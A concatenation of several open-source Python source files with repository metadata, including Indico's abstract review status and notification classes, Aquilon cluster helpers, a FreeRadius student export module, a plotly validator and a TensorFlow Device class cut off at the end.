"""
s = self._getStatusClass()( self._abstract )
self.getAbstract().setCurrentStatus( s )
def withdraw(self,resp,comments=""):
"""
"""
s=AbstractStatusWithdrawn(self.getAbstract(), resp, self, comments)
self.getAbstract().setCurrentStatus(s)
def recover( self ):
"""
"""
raise MaKaCError( _("only withdrawn abstracts can be recovered"))
def markAsDuplicated(self,responsible,originalAbs,comments=""):
"""
"""
if self.getAbstract()==originalAbs:
raise MaKaCError( _("the original abstract is the same as the duplicated one"))
if isinstance(originalAbs.getCurrentStatus(),AbstractStatusDuplicated):
raise MaKaCError( _("cannot set as original abstract one which is already marked as duplicated"))
s=AbstractStatusDuplicated(self.getAbstract(),responsible,originalAbs,comments)
self.getAbstract().setCurrentStatus(s)
def unMarkAsDuplicated(self,responsible,comments=""):
"""
"""
raise MaKaCError( _("Only duplicated abstract can be unmark as duplicated"))
def mergeInto(self,responsible,targetAbs,comments=""):
"""
"""
if self.getAbstract()==targetAbs:
raise MaKaCError( _("An abstract cannot be merged into itself"))
if targetAbs.getCurrentStatus().__class__ not in [AbstractStatusSubmitted,AbstractStatusUnderReview,AbstractStatusProposedToAccept,AbstractStatusProposedToReject,AbstractStatusInConflict]:
raise MaKaCError(_("Target abstract is in a status which cannot receive mergings"))
s=AbstractStatusMerged(self.getAbstract(),responsible,targetAbs,comments)
self.getAbstract().setCurrentStatus(s)
def unMerge(self,responsible,comments=""):
"""
"""
raise MaKaCError( _("Only merged abstracts can be unmerged"))
def getComments(self):
return ""
class AbstractStatusSubmitted( AbstractStatus ):
"""
"""
def clone(self,abstract):
ass = AbstractStatusSubmitted(abstract)
return ass
def update( self ):
#if an abstract that has been submitted has no judgement it
# must remain in the submitted status
if self._abstract.getNumJudgements() == 0:
return
AbstractStatus.update( self )
class AbstractStatusAccepted( AbstractStatus ):
"""
"""
def __init__(self,abstract,responsible,destTrack,type,comments=""):
AbstractStatus.__init__( self, abstract )
self._setResponsible( responsible )
self._setTrack( destTrack )
self._setComments( comments )
self._setType( type )
self._contrib = None
def clone(self,abstract):
asa = AbstractStatusAccepted(abstract,self.getResponsible(), self.getTrack(), self.getType(), self.getComments())
return asa
def _setResponsible( self, res ):
self._responsible = res
def getResponsible( self ):
return self._responsible
def _setComments( self, comments ):
self._comments = str( comments ).strip()
def getComments( self ):
try:
if self._comments:
pass
except AttributeError:
self._comments = ""
return self._comments
def _setTrack( self, track ):
self._track = track
def getTrack( self ):
try:
if self._track:
pass
except AttributeError:
self._track = None
return self._track
def _setType( self, type ):
self._contribType = type
def getType( self ):
try:
if self._contribType:
pass
except AttributeError:
self._contribType = None
return self._contribType
def setContribution( self, newContrib ):
self._contrib = newContrib
def getContribution( self ):
try:
if self._contrib:
pass
except AttributeError:
self._contrib = None
return self._contrib
def update( self ):
return
def accept(self,responsible,destTrack,type,comments="" ):
raise MaKaCError( _("Cannot accept an abstract which is already accepted"))
def reject( self, responsible, comments="" ):
raise MaKaCError( _("Cannot reject an abstract which is already accepted"))
def proposeToAccept( self ):
raise MaKaCError( _("Cannot propose for acceptance an abstract which is already accepted"))
def proposeToReject( self ):
raise MaKaCError( _("Cannot propose for rejection an abstract which is already accepted"))
def proposeToReallocate( self ):
raise MaKaCError( _("Cannot propose for reallocation an abstract which is already accepted"))
def markAsDuplicated(self,responsible,originalAbs,comments=""):
raise MaKaCError( _("Cannot mark as duplicated an abstract which is accepted"))
def unMarkAsDuplicated(self,responsible,comments=""):
"""
"""
raise MaKaCError( _("Only duplicated abstract can be unmark as duplicated"))
def mergeInto(self,responsible,targetAbs,comments=""):
raise MaKaCError( _("Cannot merge an abstract which is already accepted"))
def withdraw(self,resp,comments=""):
"""
"""
contrib=self.getContribution()
#this import is made here and not at the top of the file in order to
# avoid recursive import troubles
from MaKaC.conference import ContribStatusWithdrawn
if contrib is not None and \
not isinstance(contrib.getCurrentStatus(),ContribStatusWithdrawn):
contrib.withdraw(resp, i18nformat(""" _("abstract withdrawn"): %s""")%comments)
AbstractStatus.withdraw(self,resp,comments)
class AbstractStatusRejected( AbstractStatus ):
"""
"""
def __init__( self, abstract, responsible, comments = "" ):
AbstractStatus.__init__( self, abstract )
self._setResponsible( responsible )
self._setComments( comments )
def clone(self,abstract):
asr = AbstractStatusRejected(abstract, self.getResponsible(), self.getComments())
return asr
def _setResponsible( self, res ):
self._responsible = res
def getResponsible( self ):
return self._responsible
def _setComments( self, comments ):
self._comments = str( comments ).strip()
def getComments( self ):
try:
if self._comments:
pass
except AttributeError:
self._comments = ""
return self._comments
def update( self ):
return
def reject( self, responsible, comments="" ):
raise MaKaCError( _("Cannot reject an abstract which is already rejected"))
def proposeToAccept( self ):
raise MaKaCError( _("Cannot propose for acceptance an abstract which is already rejected"))
def proposeToReject( self ):
raise MaKaCError( _("Cannot propose for rejection an abstract which is already rejected"))
def proposeToReallocate( self ):
raise MaKaCError( _("Cannot propose for reallocation an abstract which is already rejected"))
def withdraw(self,resp,comments=""):
raise MaKaCError( _("Cannot withdraw a REJECTED abstract"))
def markAsDuplicated(self,responsible,originalAbs,comments=""):
raise MaKaCError( _("Cannot mark as duplicated an abstract which is rejected"))
def unMarkAsDuplicated(self,responsible,comments=""):
"""
"""
raise MaKaCError( _("Only duplicated abstract can be unmark as duplicated"))
def mergeInto(self,responsible,targetAbs,comments=""):
raise MaKaCError( _("Cannot merge an abstract which is rejected"))
class AbstractStatusUnderReview( AbstractStatus ):
"""
"""
def clone(self,abstract):
asur = AbstractStatusUnderReview(abstract)
return asur
class AbstractStatusProposedToAccept( AbstractStatus ):
"""
"""
def clone(self, abstract):
aspta = AbstractStatusProposedToAccept(abstract)
return aspta
def getTrack(self):
jud=self.getAbstract().getTrackAcceptanceList()[0]
return jud.getTrack()
def getType(self):
jud=self.getAbstract().getTrackAcceptanceList()[0]
return jud.getContribType()
class AbstractStatusProposedToReject( AbstractStatus ):
"""
"""
def clone(self, abstract):
asptr = AbstractStatusProposedToReject(abstract)
return asptr
class AbstractStatusInConflict( AbstractStatus ):
"""
"""
def clone(self,abstract):
asic = AbstractStatusInConflict(abstract)
return asic
class AbstractStatusWithdrawn(AbstractStatus):
"""
"""
def __init__(self,abstract,responsible, prevStatus,comments=""):
AbstractStatus.__init__(self,abstract)
self._setComments(comments)
self._setResponsible(responsible)
self._prevStatus=prevStatus
def clone(self,abstract):
asw = AbstractStatusWithdrawn(abstract,self.getResponsible(),self.getComments())
return asw
def _setResponsible(self,newResp):
self._responsible=newResp
def getResponsible(self):
try:
if self._responsible:
pass
except AttributeError,e:
self._responsible=self._abstract.getSubmitter().getAvatar()
return self._responsible
def getPrevStatus(self):
try:
if self._prevStatus:
pass
except AttributeError,e:
self._prevStatus=None
return self._prevStatus
def _setComments( self, comments ):
self._comments = str( comments ).strip()
def getComments( self ):
return self._comments
def update( self ):
return
def accept(self,responsible,destTrack,type,comments=""):
raise MaKaCError( _("Cannot accept an abstract wich is withdrawn"))
def reject( self, responsible, comments="" ):
raise MaKaCError( _("Cannot reject an abstract which is withdrawn"))
def proposeToAccept( self ):
raise MaKaCError( _("Cannot propose for acceptance an abstract which withdrawn"))
def proposeToReject( self ):
raise MaKaCError( _("Cannot propose for rejection an abstract which is withdrawn"))
def recover( self ):
if self.getPrevStatus() is None:
# reset all the judgments
self._clearTrackAcceptances()
self._clearTrackRejections()
self._clearTrackReallocations()
# setting the status
contrib=self.getAbstract().getContribution()
if contrib is None:
s = AbstractStatusSubmitted( self.getAbstract() )
else:
s = AbstractStatusAccepted(self.getAbstract(),self.getResponsible(),contrib.getTrack(),contrib.getType(),"")
else:
contrib=self.getAbstract().getContribution()
if contrib is not None and not isinstance(self.getPrevStatus(), AbstractStatusAccepted):
s = AbstractStatusAccepted(self.getAbstract(),self.getResponsible(),contrib.getTrack(),contrib.getType(),"")
else:
s=self.getPrevStatus()
self.getAbstract().setCurrentStatus( s )
def markAsDuplicated(self,responsible,originalAbs,comments=""):
raise MaKaCError( _("Cannot mark as duplicated an abstract which is withdrawn"))
def unMarkAsDuplicated(self,responsible,comments=""):
"""
"""
raise MaKaCError( _("Only duplicated abstract can be unmark as duplicated"))
def mergeInto(self,responsible,targetAbs,comments=""):
raise MaKaCError( _("Cannot merge an abstract which is withdrawn"))
def withdraw(self,resp,comments=""):
raise MaKaCError( _("This abstract is already withdrawn"))
class AbstractStatusDuplicated(AbstractStatus):
"""
"""
def __init__( self,abstract,responsible,originalAbstract,comments=""):
AbstractStatus.__init__(self,abstract)
self._setResponsible(responsible)
self._setComments(comments)
self._setOriginalAbstract(originalAbstract)
def clone(self, abstract):
asd = AbstractStatusDuplicated(abstract,self.getResponsible(),self.getOriginal(),self.getComments())
return asd
def _setResponsible( self, res ):
self._responsible = res
def getResponsible(self):
return self._responsible
def _setComments( self, comments ):
self._comments = str( comments ).strip()
def getComments( self ):
return self._comments
def _setOriginalAbstract(self,abs):
self._original=abs
def getOriginal(self):
return self._original
def update( self ):
return
def reject( self, responsible, comments="" ):
raise MaKaCError( _("Cannot reject an abstract which is duplicated"))
def proposeToAccept( self ):
raise MaKaCError( _("Cannot propose for acceptance an abstract which is duplicated"))
def proposeToReject( self ):
raise MaKaCError( _("Cannot propose for rejection an abstract which is duplicated"))
def proposeToReallocate( self ):
raise MaKaCError( _("Cannot propose for reallocation an abstract which is duplicated"))
def withdraw(self,resp,comments=""):
raise MaKaCError( _("Cannot withdraw a duplicated abstract"))
def markAsDuplicated(self,responsible,originalAbs,comments=""):
raise MaKaCError( _("This abstract is already duplicated"))
def unMarkAsDuplicated(self,responsible,comments=""):
s = AbstractStatusSubmitted( self.getAbstract() )
self.getAbstract().setCurrentStatus( s )
def mergeInto(self,responsible,targetAbs,comments=""):
raise MaKaCError( _("Cannot merge an abstract which is marked as a duplicate"))
class AbstractStatusMerged(AbstractStatus):
"""
"""
def __init__(self,abstract,responsible,targetAbstract,comments=""):
AbstractStatus.__init__(self,abstract)
self._setResponsible(responsible)
self._setComments(comments)
self._setTargetAbstract(targetAbstract)
def clone(self,abstract):
asm = AbstractStatusMerged(abstract,self.getResponsible(),self.getTargetAbstract(),self.getComments())
return asm
def _setResponsible( self, res ):
self._responsible = res
def getResponsible( self ):
return self._responsible
def _setComments( self, comments ):
self._comments = str( comments ).strip()
def getComments( self ):
return self._comments
def _setTargetAbstract(self,abstract):
self._target=abstract
def getTargetAbstract(self):
return self._target
def update( self ):
return
def reject( self, responsible, comments="" ):
raise MaKaCError( _("Cannot reject an abstract which is merged into another one"))
def proposeToAccept( self ):
raise MaKaCError( _("Cannot propose for acceptance an abstract which is merged into another one"))
def proposeToReject( self ):
raise MaKaCError( _("Cannot propose for rejection an abstract which is merged into another one"))
def proposeToReallocate( self ):
raise MaKaCError( _("Cannot propose for reallocation an abstract which is merged into another one"))
def withdraw(self,resp,comments=""):
raise MaKaCError( _("Cannot withdraw an abstract which is merged into another one"))
def markAsDuplicated(self,responsible,originalAbs,comments=""):
raise MaKaCError( _("Cannot mark as duplicated an abstract which is merged into another one"))
def unMarkAsDuplicated(self,responsible,comments=""):
"""
"""
raise MaKaCError( _("Only duplicated abstract can be unmark as duplicated"))
def mergeInto(self,responsible,target,comments=""):
raise MaKaCError( _("This abstract is already merged into another one"))
def unMerge(self,responsible,comments=""):
s = AbstractStatusSubmitted( self.getAbstract() )
self.getAbstract().setCurrentStatus( s )
class AbstractStatusNone(AbstractStatus):
# This is a special status we assign to abstracts that are put in the trash can.
def __init__(self,abstract):
AbstractStatus.__init__(self,abstract)
def clone(self,abstract):
asn = AbstractStatusNone(abstract)
return asn
class NotificationTemplate(Persistent):
def __init__(self):
self._owner=None
self._id=""
self._name=""
self._description=""
self._tplSubject=""
self._tplBody=""
self._fromAddr = ""
self._CAasCCAddr = False
self._ccAddrList=PersistentList()
self._toAddrs = PersistentList()
self._conditions=PersistentList()
self._toAddrGenerator=Counter()
self._condGenerator=Counter()
def clone(self):
tpl = NotificationTemplate()
tpl.setName(self.getName())
tpl.setDescription(self.getDescription())
tpl.setTplSubject(self.getTplSubject())
tpl.setTplBody(self.getTplBody())
tpl.setFromAddr(self.getFromAddr())
tpl.setCAasCCAddr(self.getCAasCCAddr())
for cc in self.getCCAddrList() :
tpl.addCCAddr(cc)
for to in self.getToAddrList() :
tpl.addToAddr(to)
for con in self.getConditionList() :
tpl.addCondition(con.clone(tpl))
return tpl
def delete(self):
self.clearToAddrs()
self.clearCCAddrList()
self.clearConditionList()
TrashCanManager().add(self)
def recover(self):
TrashCanManager().remove(self)
## def getResponsible( self ):
## return self._responsible
##
## def _setComments( self, comments ):
## self._comments = str( comments ).strip()
##
## def getComments( self ):
## return self._comments
##
## def _setOriginalAbstract(self,abstract):
## self._original=abstract
def canModify(self, aw_or_user):
return self.getConference().canModify(aw_or_user)
def getLocator(self):
loc = self.getOwner().getConference().getLocator()
loc["notifTplId"] = self._id
return loc
def getConference(self):
return self._owner.getConference()
def includeInOwner(self,owner,id):
self._owner=owner
self._id=id
def getOwner(self):
return self._owner
def getId(self):
return self._id
def setName(self,newName):
self._name=newName.strip()
def getName(self):
return self._name
def setDescription(self,newDesc):
self._description=newDesc.strip()
def getDescription(self):
return self._description
def setTplSubject(self,newSubject, varList):
self._tplSubject=self.parseTplContent(newSubject, varList).strip()
def getTplSubject(self):
return self._tplSubject
def getTplSubjectShow(self, varList):
return self.parseTplContentUndo(self._tplSubject, varList)
def setTplBody(self,newBody, varList):
self._tplBody=self.parseTplContent(newBody, varList).strip()
def getTplBody(self):
return self._tplBody
def getTplBodyShow(self, varList):
return self.parseTplContentUndo(self._tplBody, varList)
def getCCAddrList(self):
try:
if self._ccAddrList:
pass
except AttributeError:
self._ccAddrList=PersistentList()
return self._ccAddrList
def addCCAddr(self,newAddr):
try:
if self._ccAddrList:
pass
except AttributeError:
self._ccAddrList=PersistentList()
ccAddr=newAddr.strip()
if ccAddr!="" and ccAddr not in self._ccAddrList:
self._ccAddrList.append(ccAddr)
def setCCAddrList(self,l):
self.clearCCAddrList()
for addr in l:
self.addCCAddr(addr)
def setCAasCCAddr(self, CAasCCAddr):
self._CAasCCAddr = CAasCCAddr
def getCAasCCAddr(self):
try:
if self._CAasCCAddr:
pass
except AttributeError:
self._CAasCCAddr = False
return self._CAasCCAddr
def clearCCAddrList(self):
self._ccAddrList=PersistentList()
def getFromAddr(self):
try:
return self._fromAddr
except AttributeError:
self._fromAddr = self._owner.getConference().getSupportInfo().getEmail()
return self._fromAddr
def setFromAddr(self, addr):
self._fromAddr = addr
def addToAddr(self,toAddr):
"""
"""
if self.hasToAddr(toAddr.__class__):
return
try:
if self._toAddrGenerator:
pass
except AttributeError, e:
self._toAddrGenerator = Counter()
id = toAddr.getId()
if id == -1:
id = int(self._toAddrGenerator.newCount())
toAddr.includeInTpl(self,id)
self.getToAddrList().append(toAddr)
def removeToAddr(self,toAddr):
"""
"""
if not self.hasToAddr(toAddr.__class__):
return
self.getToAddrList().remove(toAddr)
toAddr.includeInTpl(None,toAddr.getId())
toAddr.delete()
def recoverToAddr(self, toAddr):
self.addToAddr(toAddr)
toAddr.recover()
def getToAddrs(self, abs):
users = []
for toAddr in self.getToAddrList():
users += toAddr.getToAddrList(abs)
return users
def getToAddrList(self):
"""
"""
try:
if self._toAddrs:
pass
except AttributeError, e:
self._toAddrs = PersistentList()
return self._toAddrs
def getToAddrById(self,id):
"""
"""
for toAddr in self.getToAddrList():
if toAddr.getId()==int(id):
return toAddr
return None
def hasToAddr(self,toAddrKlass):
"""Returns True if the TPL contains a "toAddr" which class is "toAddrKlass"
"""
for toAddr in self.getToAddrList():
if toAddr.__class__ == toAddrKlass:
return True
return False
def clearToAddrs(self):
while(len(self.getToAddrList())>0):
self.removeToAddr(self.getToAddrList()[0])
def addCondition(self,cond):
"""
"""
if cond in self._conditions:
return
id = cond.getId()
if id == -1:
id = int(self._condGenerator.newCount())
cond.includeInTpl(self, id)
self._conditions.append(cond)
def removeCondition(self,cond):
"""
"""
if cond not in self._conditions:
return
self._conditions.remove(cond)
cond.delete()
def recoverCondition(self, cond):
self.addCondition(cond)
cond.recover()
def getConditionList(self):
"""
"""
return self._conditions
def getConditionById(self,id):
"""
"""
for cond in self._conditions:
if cond.getId()==int(id):
return cond
return None
def clearConditionList(self):
while(len(self.getConditionList())>0):
self.removeCondition(self.getConditionList()[0])
def satisfies(self,abs):
"""
"""
for cond in self._conditions:
if cond.satisfies(abs):
return True
return False
def parseTplContent(self, content, varList):
# replace the % in order to avoid exceptions
result = content.replace("%", "%%")
# find the vars and make the expressions, it is necessary to do in reverse in order to find the longest tags first
for var in varList:
result = result.replace("{"+var.getName()+"}", "%("+var.getName()+")s")
return result
def parseTplContentUndo(self, content, varList):
# The body content is shown without "%()" and with "%" in instead of "%%" but it is not modified
result = content
for var in varList:
result = result.replace("%("+var.getName()+")s", "{"+var.getName()+"}")
# replace the %% by %
result = result.replace("%%", "%")
return result
def getModifKey( self ):
return self.getConference().getModifKey()
class NotifTplToAddr(Persistent):
"""
"""
def __init__(self):
self._tpl=None
self._id=-1
def clone(self):
ntta = NotifTplToAddr()
return ntta
def delete(self):
TrashCanManager().add(self)
def recover(self):
TrashCanManager().remove(self)
def includeInTpl(self,newTpl,newId):
self._tpl=newTpl
self._id=newId
def getTpl(self):
return self._tpl
def getId(self):
return self._id
def getToAddrList(self,absList):
"""
Return a list with all the emails for a group.
"""
return []
class NotifTplToAddrSubmitter(NotifTplToAddr):
def getToAddrList(self,abs):
l = []
l.append(abs.getSubmitter())
return l
def clone(self):
nttas = NotifTplToAddrSubmitter()
return nttas
class NotifTplToAddrPrimaryAuthors(NotifTplToAddr):
def getToAddrList(self,abs):
l = []
for pa in abs.getPrimaryAuthorList():
l.append(pa)
return l
def clone(self):
nttapa = NotifTplToAddrPrimaryAuthors()
return nttapa
class NotifTplCondition(Persistent):
"""
"""
def __init__(self):
self._tpl=None
self._id=-1
def clone(self, template):
con = NotifyCondition()
con.includeInTpl(template)
return con
def delete(self):
TrashCanManager().add(self)
def recover(self):
TrashCanManager().remove(self)
def includeInTpl(self,newTpl,newId):
self._tpl=newTpl
self._id=newId
def getTpl(self):
return self._tpl
def getId(self):
return self._id
def satisfies(self,abs):
return True
class NotifTplCondAccepted(NotifTplCondition):
def __init__(self,track="--any--",contribType="--any--"):
NotifTplCondition.__init__(self)
self._track=track
self._contribType=contribType
def clone(self, conference, template):
ntca = NotifTplCondAccepted()
for newtrack in conference.getTrackList() :
if newtrack.getTitle() == self.getTrack().getTitle() :
ntca.setTrack(newtrack)
for newtype in conference.getContribTypeList() :
if newtype.getName() == self.getContribType() :
ntca.setContribType(newtype)
return ntca
def setContribType(self, ct="--any--"):
self._contribType = ct
def getContribType(self):
return self._contribType
def setTrack(self, tr="--any--"):
self._track = tr
def getTrack(self):
try:
if self._track:
pass
except AttributeError:
self._track="--any--"
return self._track
def _satifiesContribType(self,abs):
status=abs.getCurrentStatus()
if self._contribType=="--any--":
return True
else:
if self._contribType=="" or self._contribType==None or \
self._contribType=="--none--":
return status.getType()=="" or status.getType()==None
return status.getType()==self._contribType
return False
def _satifiesTrack(self,abs):
status=abs.getCurrentStatus()
if self.getTrack()=="--any--":
return True
else:
if self.getTrack()=="" or self.getTrack() is None or \
self.getTrack()=="--none--":
return status.getTrack()=="" or status.getTrack()==None
return status.getTrack()==self.getTrack()
return False
def satisfies(self,abs):
if not isinstance(abs.getCurrentStatus(),AbstractStatusAccepted):
return False
else:
return self._satifiesContribType(abs) and self._satifiesTrack(abs)
class NotifTplCondRejected(NotifTplCondition):
def satisfies(self,abs):
return isinstance(abs.getCurrentStatus(),AbstractStatusRejected)
def clone(self, conference, template):
ntcr = NotifTplCondRejected()
ntcr.includeInTpl(template)
return ntcr
class NotifTplCondMerged(NotifTplCondition):
def satisfies(self,abs):
return isinstance(abs.getCurrentStatus(),AbstractStatusMerged)
def clone(self, conference, template):
ntcm = NotifTplCondMerged()
ntcm.includeInTpl(newTpl, newId)
class NotificationLog(Persistent):
def __init__(self,abstract):
self._abstract=abstract
self._entries=PersistentList()
def getAbstract(self):
return self._abstract
def addEntry(self,newEntry):
if newEntry!=None and newEntry not in self._entries:
self._entries.append(newEntry)
def getEntryList(self):
return self._entries
# The 3 following metods are used only for recovery purposes:
def removeEntry(self, entry):
if entry!=None and entry in self._entries:
self._entries.remove(entry)
entry.delete()
def recoverEntry(self, entry):
self.addEntry(entry)
entry.recover()
def clearEntryList(self):
while len(self.getEntryList()) > 0:
self.removeEntry(self.getEntryList()[0])
# -----------------------------------------------------------
class NotifLogEntry(Persistent):
def __init__(self,responsible,tpl):
self._setDate(nowutc())
self._setResponsible(responsible)
self._setTpl(tpl)
def _setDate(self,newDate):
self._date=newDate
def getDate(self):
return self._date
def _setResponsible(self,newResp):
self._responsible=newResp
def getResponsible(self):
return self._responsible
def _setTpl(self,newTpl):
self._tpl=newTpl
def getTpl(self):
return self._tpl
def delete(self):
TrashCanManager().add(self)
def recover(self):
TrashCanManager().remove(self)
| XeCycle/indico | indico/MaKaC/review.py | Python | gpl-3.0 | 133,200 |
__author__ = 'mglass'
| radiasoft/optics | optics/magnetic_structures/__init__.py | Python | apache-2.0 | 22 |
# -*- cpy-indent-level: 4; indent-tabs-mode: nil -*-
# ex: set expandtab softtabstop=4 shiftwidth=4:
#
# Copyright (C) 2014,2015,2016,2017 Contributor
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from sqlalchemy.orm import aliased, object_session
from sqlalchemy.sql import or_
from aquilon.exceptions_ import ArgumentError
from aquilon.aqdb.model import (Archetype, Personality, PersonalityStage,
ClusterLifecycle, Cluster, Host, HardwareEntity,
Location, Building, BuildingPreference)
from aquilon.worker.dbwrappers.branch import get_branch_and_author
def parse_cluster_arguments(session, config, archetype, personality,
personality_stage, domain, sandbox, buildstatus,
max_members):
dbarchetype = Archetype.get_unique(session, archetype, compel=True)
section = "archetype_" + dbarchetype.name
if not personality:
if config.has_option(section, "default_personality"):
personality = config.get(section, "default_personality")
if not personality:
raise ArgumentError("There is no default personality configured "
"for {0:l}, please specify --personality."
.format(dbarchetype))
dbpersonality = Personality.get_unique(session, name=personality,
archetype=dbarchetype, compel=True)
if not dbpersonality.is_cluster:
raise ArgumentError("%s is not a cluster personality." %
personality)
if not buildstatus:
buildstatus = "build"
dbstatus = ClusterLifecycle.get_instance(session, buildstatus)
if not domain and not sandbox and \
config.has_option(section, "default_domain"):
domain = config.get(section, "default_domain")
if not domain and not sandbox: # pragma: no cover
raise ArgumentError("There is no default domain configured for "
"{0:l}, please specify --domain or --sandbox."
.format(dbarchetype))
dbbranch, dbauthor = get_branch_and_author(session, domain=domain,
sandbox=sandbox, compel=True)
if hasattr(dbbranch, "allow_manage") and not dbbranch.allow_manage:
raise ArgumentError("Adding clusters to {0:l} is not allowed."
.format(dbbranch))
if max_members is None and config.has_option(section, "max_members_default"):
max_members = config.getint(section, "max_members_default")
kw = {'personality_stage': dbpersonality.default_stage(personality_stage),
'branch': dbbranch,
'sandbox_author': dbauthor,
'status': dbstatus,
'max_members': max_members}
return kw
def get_clusters_by_locations(session, locations, archetype):
"""
Return clusters which has members inside all the locations specified.
The most common use case is looking for clusters which span a given pair
of buildings, but nothing below is limited to buildings or only two
locations.
"""
q = session.query(Cluster)
q = q.join(PersonalityStage, Personality)
q = q.filter_by(archetype=archetype)
q = q.reset_joinpoint()
for side in locations:
HWLoc = aliased(Location)
Parent = aliased(Location)
q1 = session.query(Cluster.id)
q1 = q1.join(Cluster._hosts, Host, HardwareEntity)
q1 = q1.join(HWLoc, HardwareEntity.location)
q1 = q1.outerjoin(Parent, HWLoc.parents)
q1 = q1.filter(or_(HWLoc.id == side.id, Parent.id == side.id))
q = q.filter(Cluster.id.in_(q1.subquery()))
# TODO: Add eager-loading options
return q.all()
def get_cluster_location_preference(dbcluster):
if dbcluster.preferred_location:
return dbcluster.preferred_location
if not dbcluster.archetype.has_building_preferences:
return None
buildings = dbcluster.member_locations(location_class=Building)
if not buildings or len(buildings) != 2:
return None
pair = BuildingPreference.ordered_pair(buildings)
session = object_session(dbcluster)
db_pref = BuildingPreference.get_unique(session, building_pair=pair,
archetype=dbcluster.archetype)
if db_pref:
return db_pref.prefer
else:
return None
def check_cluster_priority_order(dbcluster, config, priority_parameter, priord):
section = "archetype_" + dbcluster.archetype.name
try:
cpri_min = int(config.get(section, "min_priority_order"))
cpri_max = int(config.get(section, "max_priority_order"))
cpri_src = "configured"
except (NoSectionError, NoOptionError):
cpri_min = 1
cpri_max = 99
cpri_src = "built-in"
if (int(priord) < cpri_min) or (int(priord) > cpri_max):
raise ArgumentError("Value for {0} ({1}) is outside of the {2} range "
"{3}..{4}".format(priority_parameter, priord,
cpri_src, cpri_min, cpri_max))
return (cpri_min, cpri_max, cpri_src)
| quattor/aquilon | lib/aquilon/worker/dbwrappers/cluster.py | Python | apache-2.0 | 5,714 |
"""
bbss - BBS Student Management
Exports student data for FreeRadius server configuration.
Created on Mon Feb 26 15:08:56 2014
@author: Christian Wichmann
"""
import logging
import os
from itertools import chain
__all__ = ['export_data']
logger = logging.getLogger('bbss.radius')
def export_data(output_file, change_set):
"""
Exports a given change set into a configuration file for a Radius authentication server.
"""
if os.path.exists(output_file):
logger.warning('Output file already exists, will be overwritten...')
with open(output_file, 'w') as export_file:
count = 0
class_of_student = ''
line = '{:20}\t\tCleartext-Password := "{}"\n'
last_exported_student = None
for student in sorted(chain(change_set.students_added, change_set.students_changed)):
if student == last_exported_student:
continue
last_exported_student = student
count += 1
if class_of_student != student.classname:
export_file.write('# {}\n'.format(student.classname))
class_of_student = student.classname
formatted_line = line.format(student.generate_user_id().lower(),
student.generate_password())
export_file.write(formatted_line)
logger.debug('{0} students exported to radius file format.'
.format(count))
| wichmann/bbss | bbss/radius.py | Python | gpl-2.0 | 1,456 |
import _plotly_utils.basevalidators
class FamilyValidator(_plotly_utils.basevalidators.StringValidator):
def __init__(
self, plotly_name="family", parent_name="waterfall.hoverlabel.font", **kwargs
):
super(FamilyValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
array_ok=kwargs.pop("array_ok", True),
edit_type=kwargs.pop("edit_type", "none"),
no_blank=kwargs.pop("no_blank", True),
strict=kwargs.pop("strict", True),
**kwargs
)
| plotly/plotly.py | packages/python/plotly/plotly/validators/waterfall/hoverlabel/font/_family.py | Python | mit | 574 |
from django.contrib import admin
from .models import File
admin.site.register(File) | goldhand/django-nufiles | nufiles/admin.py | Python | bsd-3-clause | 85 |
"""Class to represent a device."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import copy
class Device(object):
"""Represents a Device."""
def __init__(self, job=None, replica=None, task=None, device_type=None,
device_index=None):
"""Create a new device object.
Args:
job: string. Optional device job name.
replica: int. Optional replica index.
task: int. Optional task index.
device_type: Optional device type string (e.g. "CPU" or "GPU")
device_index: int. Optional device index. If left
unspecified, device represents 'any' device_index.
"""
self.job = job
self.replica = replica
self.task = task
if device_type == "cpu" or device_type == "gpu":
# For backwards compatibility only, we support lowercase variants of
# cpu and gpu but turn them into uppercase here.
self.device_type = device_type.upper()
else:
self.device_type = device_type
self.device_index = device_index
def _clear(self):
self._job = None
self._replica = None
self._task = None
self.device_type = None
self.device_index = None
@property
def job(self):
return self._job
@job.setter
def job(self, job):
if job is not None:
self._job = str(job)
else:
self._job = None
@property
def replica(self):
return self._replica
@replica.setter
def replica(self, replica):
if replica is not None:
self._replica = int(replica)
else:
self._replica = None
@property
def task(self):
return self._task
@task.setter
def task(self, task):
if task is not None:
self._task = int(task)
else:
self._task = None
def parse_from_string(self, spec):
"""Parse a Device name into its components.
Args:
spec: a string of the form
/job:<name>/replica:<id>/task:<id>/device:CPU:<id>
or
/job:<name>/replica:<id>/task:<id>/device:GPU:<id>
as cpu and gpu are mutually exclusive.
All entries are optional.
Returns:
The Device, for convenience.
Raises:
ValueError: if the spec was not valid.
"""
self._clear()
splits = [x.split(":") for x in spec.split("/")]
for y in splits:
ly = len(y)
if y:
# NOTE(touts): we use the property getters here.
if ly == 2 and y[0] == "job":
self.job = y[1]
elif ly == 2 and y[0] == "replica":
self.replica = y[1]
elif ly == 2 and y[0] == "task":
self.task = y[1]
elif ((ly == 1 or ly == 2) and
((y[0].upper() == "GPU") or (y[0].upper() == "CPU"))):
if self.device_type is not None:
raise ValueError("Cannot specify multiple device types: %s" % spec)
self.device_type = y[0].upper()
if ly == 2 and y[1] != "*":
self.device_index = int(y[1])
elif ly == 3 and y[0] == "device":
if self.device_type is not None:
raise ValueError("Cannot specify multiple device types: %s" % spec)
self.device_type = y[1]
if y[2] != "*":
self.device_index = int(y[2])
elif ly and y[0] != "": # pylint: disable=g-explicit-bool-comparison
raise ValueError("Unknown attribute: '%s' in '%s'" % (y[0], spec))
return self
def merge_from(self, dev):
"""Merge the properties of "dev" into this Device.
Args:
dev: a Device.
"""
if dev.job is not None:
self.job = dev.job
if dev.replica is not None:
self.replica = dev.replica
if dev.task is not None:
self.task = dev.task
if dev.device_type is not None:
self.device_type = dev.device_type
if dev.device_index is not None:
self.device_index = dev.device_index
def to_string(self):
"""Return a Device specification string.
Returns:
a string of the form /job:<name>/replica:<id>/task:<id>/device:cpu:<id>
or /job:<name>/replica:<id>/task:<id>/device:cpu:<id>.
"""
dev = ""
if self.job is not None:
dev += "/job:" + self.job
if self.replica is not None:
dev += "/replica:" + str(self.replica)
if self.task is not None:
dev += "/task:" + str(self.task)
